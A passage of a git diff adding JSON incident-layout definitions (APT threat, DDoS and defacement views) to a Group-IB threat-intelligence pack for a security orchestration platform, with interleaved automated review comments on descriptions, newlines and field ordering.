"caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + 
"startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "details", + "height": 106, + "id": "incident-details-field", + "index": 0, + "listId": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-88c8a3c0-6387-11ef-b29f-a384ad57ecea", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatecreated", + "height": 22, + "id": "b159ec90-6387-11ef-b29f-a384ad57ecea", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "0c2fb550-6388-11ef-b29f-a384ad57ecea", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "48ce5ac0-6388-11ef-b29f-a384ad57ecea", + "index": 2, + 
"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdateofdetection", + "height": 22, + "id": "a9df23d0-6388-11ef-b29f-a384ad57ecea", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from GIB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB APT Threat Layout", + "name": "GIB APT Threat Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_DDOS_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_DDOS_Layout.json new file mode 100644 index 000000000000..85036da8dae4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_DDOS_Layout.json 
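Review bot: The new layout's `description` is only `"Layout for GIB APT Threat"`, which does not tell an administrator what this layout adds over the default incident layout; the same applies to the DDOS layout in the next hunk (`"Layout for GIB Attacks DDOS"`). The only custom section visible in this hunk is "Information from GIB" (gibdatecreated, gibseverity, gibid, gibdateofdetection), so a description such as `"description": "Incident layout for GIB APT Threat incidents: the default Incident Info tab plus an 'Information from GIB' section (date created, severity, GIB ID, date of detection)."` would document that. The file is also written without a trailing newline, as the `\ No newline at end of file` marker shows; ending it with one avoids a spurious last-line change on every later edit.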
@@ -0,0 +1,758 @@ +{ + "description": "Layout for GIB Attacks DDOS", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + 
"maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": 
"field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-aeaabfb0-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "ff2b6c00-70fc-11ef-8b17-29df2efa74c4", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "0235c5d0-70fd-11ef-8b17-29df2efa74c4", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "04e99b30-70fd-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 
3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-af820ce0-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 2, + "fieldId": "gibddosrequestheadershash", + "height": 22, + "id": "3fc226a0-70fd-11ef-8b17-29df2efa74c4", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddosrequestdatalink", + "height": 22, + "id": "3d20eee0-70fd-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddosrequestbody", + "height": 22, + "id": "43ef7ca0-70fd-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddosrequestbodyhash", + "height": 22, + "id": "46060090-70fd-11ef-8b17-29df2efa74c4", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB DDOS Request", + "static": false, + "w": 1, + "x": 1, + "y": 4 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-b47a7b10-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "c1a96b70-70fc-11ef-8b17-29df2efa74c4", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosdatebegin", + "height": 22, + "id": "c53f3c60-70fc-11ef-8b17-29df2efa74c4", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosdateend", + "height": 22, + "id": "ca42f530-70fc-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosdateregistration", + "height": 22, + "id": "ccfbd3a0-70fc-11ef-8b17-29df2efa74c4", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 
4, + "fieldId": "gibddosduration", + "height": 22, + "id": "cff69d10-70fc-11ef-8b17-29df2efa74c4", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddosprotocol", + "height": 22, + "id": "d2ff2220-70fc-11ef-8b17-29df2efa74c4", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddossource", + "height": 22, + "id": "d7ee6890-70fc-11ef-8b17-29df2efa74c4", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibddostype", + "height": 22, + "id": "db5b06a0-70fc-11ef-8b17-29df2efa74c4", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibmalwarename", + "height": 22, + "id": "de6bc910-70fc-11ef-8b17-29df2efa74c4", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "ac661e80-8492-11ef-87c7-cfae65ac92d0", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 1, + "y": 6 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-b53f51b0-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 2, + "fieldId": "gibddostargeturl", + "height": 22, + "id": "4a461ef0-7bf8-11ef-b550-d3d94250569e", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetasn", + "height": 22, + "id": "0dd319b0-70fd-11ef-8b17-29df2efa74c4", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetcity", + "height": 22, + "id": "10ab3ff0-70fd-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetregion", + "height": 22, + "id": "14a15950-70fd-11ef-8b17-29df2efa74c4", + "index": 
3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetprovider", + "height": 22, + "id": "182b1c50-70fd-11ef-8b17-29df2efa74c4", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetcountrycode", + "height": 22, + "id": "1b1d8150-70fd-11ef-8b17-29df2efa74c4", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetcountryname", + "height": 22, + "id": "1dd26820-70fd-11ef-8b17-29df2efa74c4", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetip", + "height": 22, + "id": "230e9610-70fd-11ef-8b17-29df2efa74c4", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetport", + "height": 22, + "id": "266e89f0-70fd-11ef-8b17-29df2efa74c4", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetcategory", + "height": 22, + "id": "30898390-70fd-11ef-8b17-29df2efa74c4", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibddostargetdomain", + "height": 22, + "id": "4f34f030-7bf8-11ef-b550-d3d94250569e", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB DDOS Target", + "static": false, + "w": 1, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b741ff80-70fc-11ef-8b17-29df2efa74c4", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "ee484d40-70fc-11ef-8b17-29df2efa74c4", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "f139a0d0-70fc-11ef-8b17-29df2efa74c4", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + 
"fieldId": "gibreliability", + "height": 22, + "id": "f3f64fd0-70fc-11ef-8b17-29df2efa74c4", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "f7294040-70fc-11ef-8b17-29df2efa74c4", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7fc9b9c0-7bf7-11ef-96a8-77b28953dd87", + "items": [ + { + "endCol": 2, + "fieldId": "gibcnc", + "height": 22, + "id": "869c8d40-7bf7-11ef-96a8-77b28953dd87", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcncdomain", + "height": 22, + "id": "8b595200-7bf7-11ef-96a8-77b28953dd87", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcncport", + "height": 22, + "id": "8d67bfa0-7bf7-11ef-96a8-77b28953dd87", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcncurl", + "height": 22, + "id": "8fc7cfb0-7bf7-11ef-96a8-77b28953dd87", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "CNC Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Attacks DDOS Layout", + "name": "GIB Attacks DDOS Layout", + "system": false, + "version": -1, 
+ "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Deface_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Deface_Layout.json new file mode 100644 index 000000000000..c59b440d973b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Deface_Layout.json 
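Review bot: In the "Group-IB DDOS Request" section the items `gibddosrequestdatalink` and `gibddosrequestbody` both carry `"index": 2` while no item has index 1, so the ordering of that section is ambiguous and depends on how the layout engine breaks ties; the fix is `"index": 1` on the `gibddosrequestdatalink` item so the four fields run 0–3 like every other section in this file. Separately, `gibddosrequestbody` and `gibddosrequestdatalink` appear to surface raw attacker request data and an external link to it; whether they render as plain text or as clickable links depends on the incident field definitions, which are not in this hunk, so it is worth confirming that analysts are not handed a live link to attacker-controlled content without a warning. A short note in the layout `description`, e.g. `"Layout for GIB Attacks DDOS. Request body/data-link fields contain attacker-supplied content; treat as untrusted."`, would make that caveat visible to whoever customises the layout.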
@@ -0,0 +1,618 @@ +{ + "description": "Layout for GIB Attacks Deface", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + 
"maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": 
"field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d63a3230-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibtargetasn", + "height": 22, + "id": "047e86a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetcity", + "height": 22, + "id": "07d10d00-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcountrycode", + "height": 22, + "id": "0aa00b80-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + 
"fieldId": "gibcountryname", + "height": 22, + "id": "0d3a3e60-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetip", + "height": 22, + "id": "108e4b60-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetprovider", + "height": 22, + "id": "1379f9a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetregion", + "height": 22, + "id": "1660ecf0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Target IP", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-d7447640-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "351ad4d0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibmirrorlink", + "height": 22, + "id": "390a3770-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "3bf7e180-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibproviderdomain", + "height": 22, + "id": "3f09b560-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdefacesiteurl", + "height": 22, + "id": "424383a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdefacesource", + "height": 22, + "id": "466f04e0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": 
